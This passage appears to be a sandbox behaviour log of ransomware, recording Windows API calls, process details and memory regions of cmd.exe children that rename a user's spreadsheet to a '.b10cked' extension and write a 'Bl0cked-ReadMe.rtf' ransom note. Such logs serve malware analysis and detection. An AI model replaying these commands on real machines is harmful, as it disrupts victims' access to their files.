hFindFile=0x300040) returned 1 [0139.473] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f364 | out: lpFindFileData=0x18f364) returned 0x300040 [0139.474] FindClose (in: hFindFile=0x300040 | out: hFindFile=0x300040) returned 1 [0139.474] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.474] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.474] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.474] GetEnvironmentStringsW () returned 0x302b20* [0139.474] FreeEnvironmentStringsW (penv=0x302b20) returned 1 [0139.474] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.474] GetConsoleOutputCP () returned 0x1b5 [0139.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.484] GetUserDefaultLCID () returned 0x409 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f728, cchData=128 | out: lpLCData="0") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f728, cchData=128 | out: lpLCData="0") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f728, cchData=128 | out: lpLCData="1") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.490] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.491] GetConsoleTitleW (in: lpConsoleTitle=0x2f0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.494] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.494] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.494] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.495] _wcsicmp (_String1="move", _String2=")") returned 68 [0139.495] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0139.495] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0139.495] _wcsicmp (_String1="IF", _String2="move") returned -4 [0139.495] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0139.495] _wcsicmp (_String1="REM", _String2="move") returned 5 [0139.495] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0139.498] GetConsoleTitleW (in: lpConsoleTitle=0x18f420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0139.509] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0139.509] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0139.509] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0139.509] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0139.509] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="CD") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="REN") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0139.509] _wcsicmp (_String1="move", _String2="SET") returned -6 [0139.509] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0139.509] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0139.509] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0139.509] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0139.509] _wcsicmp (_String1="move", _String2="MD") returned 11 [0139.509] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0139.509] _wcsicmp (_String1="move", _String2="RD") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0139.509] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0139.509] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0139.509] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0139.510] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0139.510] _wcsicmp (_String1="move", _String2="VER") returned -9 [0139.510] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0139.510] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0139.510] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0139.510] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0139.510] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0139.510] _wcsicmp (_String1="move", _String2="START") returned -6 [0139.510] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0139.510] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0139.510] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0139.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.511] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.512] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.512] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2=".") returned 59 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2="..") returned 
59 [0139.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods")) returned 0x20 [0139.513] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.513] SetErrorMode (uMode=0x0) returned 0x0 [0139.513] SetErrorMode (uMode=0x1) returned 0x0 [0139.513] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", nBufferLength=0x104, lpBuffer=0x18eb64, lpFilePart=0x18eb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpFilePart=0x18eb4c*="iu1VEIcz.ods") returned 0x34 [0139.513] SetErrorMode (uMode=0x0) returned 0x1 [0139.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2=".") returned 59 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2="..") returned 59 [0139.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods")) returned 0x20 [0139.513] SetErrorMode (uMode=0x0) returned 0x0 [0139.513] SetErrorMode (uMode=0x1) returned 0x0 [0139.513] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", nBufferLength=0x104, lpBuffer=0x18efe0, lpFilePart=0x18ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpFilePart=0x18ed78*="iu1VEIcz.ods") returned 0x34 [0139.513] SetErrorMode (uMode=0x0) returned 0x1 [0139.513] SetErrorMode (uMode=0x0) returned 0x0 [0139.514] SetErrorMode (uMode=0x1) returned 0x0 [0139.514] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", nBufferLength=0x104, lpBuffer=0x18f1e8, lpFilePart=0x18ed78 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", lpFilePart=0x18ed78*="iu1VEIcz.ods.b10cked") returned 0x3c [0139.514] SetErrorMode (uMode=0x0) returned 0x1 [0139.514] SetLastError (dwErrCode=0x0) [0139.514] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods.b10cked")) returned 0xffffffff [0139.514] GetLastError () returned 0x2 [0139.514] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", fInfoLevelId=0x1, lpFindFileData=0x18e6f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6f4) returned 0x2f0ef0 [0139.514] FindNextFileW (in: hFindFile=0x2f0ef0, lpFindFileData=0x18e6f4 | out: lpFindFileData=0x18e6f4) returned 0 [0139.514] GetLastError () returned 0x12 [0139.514] FindClose (in: hFindFile=0x2f0ef0 | out: hFindFile=0x2f0ef0) returned 1 [0139.515] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", fInfoLevelId=0x1, lpFindFileData=0x301c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301c30) returned 0x2f0ef0 [0139.515] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", nBufferLength=0x104, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", lpFilePart=0x0) returned 0x3c [0139.515] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", nBufferLength=0x104, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpFilePart=0x0) returned 0x34 [0139.516] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods")) returned 0x20 [0139.516] 
MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods.b10cked"), dwFlags=0x3) returned 1 [0139.516] FindClose (in: hFindFile=0x2f0ef0 | out: hFindFile=0x2f0ef0) returned 1 [0139.516] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e940 | out: _Buffer=" 1") returned 9 [0139.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.516] GetFileType (hFile=0x7) returned 0x2 [0139.610] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.610] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8cc | out: lpMode=0x18e8cc) returned 1 [0139.610] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.610] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e900 | out: lpConsoleScreenBufferInfo=0x18e900) returned 1 [0139.610] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0139.611] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e940 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0139.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e924, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e924*=0x1a) returned 1 [0139.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.611] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.612] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0139.612] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.612] SetConsoleInputExeNameW () returned 0x1 [0139.612] GetConsoleOutputCP () returned 0x1b5 [0139.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.612] exit (_Code=0) Process: id = "161" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a00" os_pid = "0xe8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14721 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14722 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14723 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14724 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14725 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 
0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14726 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14727 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14728 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14729 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 14730 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16190 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16191 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16192 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16193 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 16194 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 16195 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = 
mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16196 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16197 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16198 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16199 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16200 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16201 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16202 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16203 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16204 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000000c0000" filename = "" Region: id = 16205 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16206 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16207 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16208 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16209 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16210 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16211 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 16212 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 16213 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 218 os_tid = 0xd94 [0141.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfdb4 | out: lpSystemTimeAsFileTime=0x2cfdb4*(dwLowDateTime=0x8e8c96c0, dwHighDateTime=0x1d440a9)) [0141.958] GetCurrentProcessId () returned 0xe8c [0141.958] GetCurrentThreadId () returned 0xd94 [0141.958] GetTickCount () returned 0x2c773 [0141.958] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfdac | out: 
lpPerformanceCount=0x2cfdac*=19874708713) returned 1 [0141.961] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.961] __set_app_type (_Type=0x1) [0141.961] __p__fmode () returned 0x76b331f4 [0141.961] __p__commode () returned 0x76b331fc [0141.961] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.961] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.961] GetCurrentThreadId () returned 0xd94 [0141.961] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd94) returned 0x38 [0141.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.962] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.962] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.962] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfd44 | out: phkResult=0x2cfd44*=0x0) returned 0x2 [0141.962] VirtualQuery (in: lpAddress=0x2cfd7b, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
